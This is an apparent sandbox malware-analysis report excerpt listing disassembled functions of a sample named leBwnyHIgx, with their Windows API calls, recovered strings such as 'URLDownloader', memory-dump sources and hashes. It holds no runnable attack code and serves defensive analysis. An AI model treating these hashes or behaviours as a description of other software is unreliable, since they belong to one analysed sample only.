                                                                                    • Instruction Fuzzy Hash: 2231D6B5A0C207AAD7249E24C544A2777926785300F25963BE401BB7D5C63CFC82AB2F
                                                                                    Function 004702D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(0046E670,00000004,0046E66C,00000000,004703CD,?,0046E66C,00000000), ref: 0047036F
                                                                                      • Part of subcall function 004085D8: CreateThread.KERNEL32(00000000,lF,004085A0,00000000,?,lF), ref: 00408632
                                                                                    • GetCurrentThread.KERNEL32 ref: 004703A7
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004703AF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$Current$CreateErrorLast
                                                                                    • String ID: 9D
                                                                                    • API String ID: 3539746228-2600770735
                                                                                    • Opcode ID: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction ID: f9857796ad14231e6e04606ef7c0ce10faa70948f457118b7ae5954610b77c36
                                                                                    • Opcode Fuzzy Hash: 20054409b78bed9dc7d827a3f23650664e97c0f182fc3617d8a6bc92920a28c5
                                                                                    • Instruction Fuzzy Hash: 9B31E070A05744EFD720DB76C8417EBBBE4AF09304F40C87EE899D7691DA78A844C769
                                                                                    Function 006508D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C,?,00000000), ref: 00650944
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000,00650E0C), ref: 0065096D
                                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,0065C528,00000000,006509D2,?,?,0066978C,?,00000000,00000000,?,00650E02,00000000), ref: 00650986
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$Move
                                                                                    • String ID: isRS-%.3u.tmp
                                                                                    • API String ID: 3839737484-3657609586
                                                                                    • Opcode ID: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction ID: fd64645e21a18fecabc0b8dc279039ee35b9e16079179385e1984e8b922befa7
                                                                                    • Opcode Fuzzy Hash: d74af280762a3c12f4f76a8dd6f825dd2da387fd0f27d3d277c556f93e4830d1
                                                                                    • Instruction Fuzzy Hash: 8131C571E002099FEB00EBA9C9829DEB7F9AF44314F50457EF814F32D2CB389E458A55
                                                                                    Function 00407A7E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00407AEA
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00007A80), ref: 00407B27
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$X7@
                                                                                    • API String ID: 3192549508-2535443016
                                                                                    • Opcode ID: a183f97fa4197104a3b990bab41dee9c34272898e6a4d50137ed02f9a6d104e1
                                                                                    • Instruction ID: b43bc4563ed2c5b4d44d4e312f14e91904ee98f66dbd2fd5bccfcfafe145c76a
                                                                                    • Opcode Fuzzy Hash: a183f97fa4197104a3b990bab41dee9c34272898e6a4d50137ed02f9a6d104e1
                                                                                    • Instruction Fuzzy Hash: B53141B0A08340AFE720EB15C985F27B7F9EB84718F1585AEE504972D1C778FC85C666
                                                                                    Function 0064E360 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,0064E434,?,0064E424,00000000,0064E408), ref: 0064E3CD
                                                                                    • CloseHandle.KERNEL32(xd,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,0064E434,?,0064E424,00000000), ref: 0064E3EA
                                                                                      • Part of subcall function 0064E2B8: GetLastError.KERNEL32(00000000,0064E353,?,?,?), ref: 0064E2DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                                    • String ID: D$xd
                                                                                    • API String ID: 3798668922-589168589
                                                                                    • Opcode ID: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction ID: 2770b63dbd5f0664191502d66b5aa67e7b61ccad1497a3da23e2b2c891076db0
                                                                                    • Opcode Fuzzy Hash: 95fcd11f6f4c2f0d745cd36e2f186585c9965836f891efbcc81fac53fca09950
                                                                                    • Instruction Fuzzy Hash: 4111A171644608AFEB00DBD5CC82EDE77EDEF09704F51407AF604E7291E6799D008A69
                                                                                    Function 00600654 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000B06,00000000,00000000), ref: 0060066E
                                                                                    • SendMessageW.USER32(?,00000B00,00000000,00000000), ref: 0060070B
                                                                                    Strings
                                                                                    • Failed to create DebugClientWnd, xrefs: 006006D4
                                                                                    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0060069A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x)$Failed to create DebugClientWnd
                                                                                    • API String ID: 3850602802-3720027226
                                                                                    • Opcode ID: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction ID: 4175b821cf142c8e622798afdf7fde6d0c746e5252e1edb01a77202dd48d2af0
                                                                                    • Opcode Fuzzy Hash: 56bf4958779bfb6a8b8f845028800d3ca9d96219ab8fc1fc975935c890bdfb99
                                                                                    • Instruction Fuzzy Hash: 7E1123B06843409FF310EB68DC81B9B7FD99B85708F180429F5849B3D2D7B66C50CBA6
                                                                                    Function 00619624 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005AF910: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,0066978C,00000000,005F8F3B,00000000,005F9216,?,?,0066978C), ref: 005AF941
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00619667
                                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 00619683
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                                    • API String ID: 4170313675-2435364021
                                                                                    • Opcode ID: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction ID: a1c6d1944a89705a1ae2f70c12028eadbe445236a7dfe10c2b454775ce8fdd12
                                                                                    • Opcode Fuzzy Hash: 6810aaf7b3462b74c952d5d02b70c3a4ed5764cd4a511497df33e8c168d44bba
                                                                                    • Instruction Fuzzy Hash: FA014470704209AFEB10FBA5CD92BDE77EDEB48704F504475B500F3292EA78AE458678
                                                                                    Function 00407FBE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00407FDF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID: (lB$0mB$X7@
                                                                                    • API String ID: 3192549508-2219141271
                                                                                    • Opcode ID: f19abbc93cf31eb417a733ce6b63261ee329484a2539bf23c4dccce9ea235883
                                                                                    • Instruction ID: ddb2fe431fc2d31df4f4c8d219a5c279b9c969c9caac19d9455eea0c72bea4c9
                                                                                    • Opcode Fuzzy Hash: f19abbc93cf31eb417a733ce6b63261ee329484a2539bf23c4dccce9ea235883
                                                                                    • Instruction Fuzzy Hash: 700180707082019BDB24DF24D9C0B2B73A2AB84700F14852EE845AB385CB38EC45DB6A
                                                                                    Function 005F912D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 005F9138
                                                                                      • Part of subcall function 00420F94: DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                      • Part of subcall function 00420F94: GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                      • Part of subcall function 00420F94: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                      • Part of subcall function 00420F94: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 005F9165
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                                    • String ID: DeleteFile$MoveFile
                                                                                    • API String ID: 3947864702-139070271
                                                                                    • Opcode ID: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction ID: b8499831526bb04dbf5f9ac4b51478e099ff73939971a2d4390da8e0a4ff792a
                                                                                    • Opcode Fuzzy Hash: d6002e4c8ce380e4da7901459b48cf98f3a1534f7a2910375105cd19add7ce7d
                                                                                    • Instruction Fuzzy Hash: CAF0497565850A9AEB00FB65D946BBE7BD4FB94304F60443BF504E32C6D93C9C01C629
                                                                                    Function 10015F31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AcquireSRWLockExclusive.KERNEL32(1001C31C,URLDownloader,?,100015D9,1001C6D4), ref: 10015F3B
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015D9,1001C6D4), ref: 10015F6E
                                                                                    • WakeAllConditionVariable.KERNEL32(1001C318,?,100015D9,1001C6D4), ref: 10015F79
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                    • String ID: URLDownloader
                                                                                    • API String ID: 1466638765-1891997712
                                                                                    • Opcode ID: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                    • Instruction ID: 2635d989befe49f68561a0190eacd187a5f89713392b86b322bdf01f88d219c5
                                                                                    • Opcode Fuzzy Hash: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                    • Instruction Fuzzy Hash: 88F0C975900628DFE746DF58D8C8E957BA8FB4D394B06C069FA0987322CB34EA50CB95
                                                                                    Function 00464920 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 004649AE
                                                                                      • Part of subcall function 00420CF0: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,0043F138,004649F0,00000000,00464A70,?,?,0043F138), ref: 00420D3F
                                                                                      • Part of subcall function 00421144: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,0043F138,00464A0B,00000000,00464A70,?,?,0043F138,00000001), ref: 00421167
                                                                                    • GetLastError.KERNEL32(00000000,00464A70,?,?,0043F138,00000001), ref: 00464A15
                                                                                      • Part of subcall function 004251D8: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 004251FC
                                                                                      • Part of subcall function 004251D8: LocalFree.KERNEL32(00000001,00425255,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,0043F138,00000000,?,00464A24,00000000,00464A70), ref: 00425248
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
                                                                                    • String ID: 4Dd$d{C
                                                                                    • API String ID: 503893064-2058038346
                                                                                    • Opcode ID: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction ID: 0683953512549e244d6d4d668f9f4a6bb5012169835e8b5d33232cac3ad6031b
                                                                                    • Opcode Fuzzy Hash: d401f3925e0a0a59aee2edcb24fb99114593ebe0fc7d03629d6b26652d1d1355
                                                                                    • Instruction Fuzzy Hash: 3F41F670E002099FCB10EFB5C8815EEB7F1AF49314F90817AE904A7382DB785E01CB6A
                                                                                    Function 0040C040 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040C051
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040C0AF
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040C10C
                                                                                    • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040C13F
                                                                                      • Part of subcall function 0040BFFC: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040C0BD), ref: 0040C013
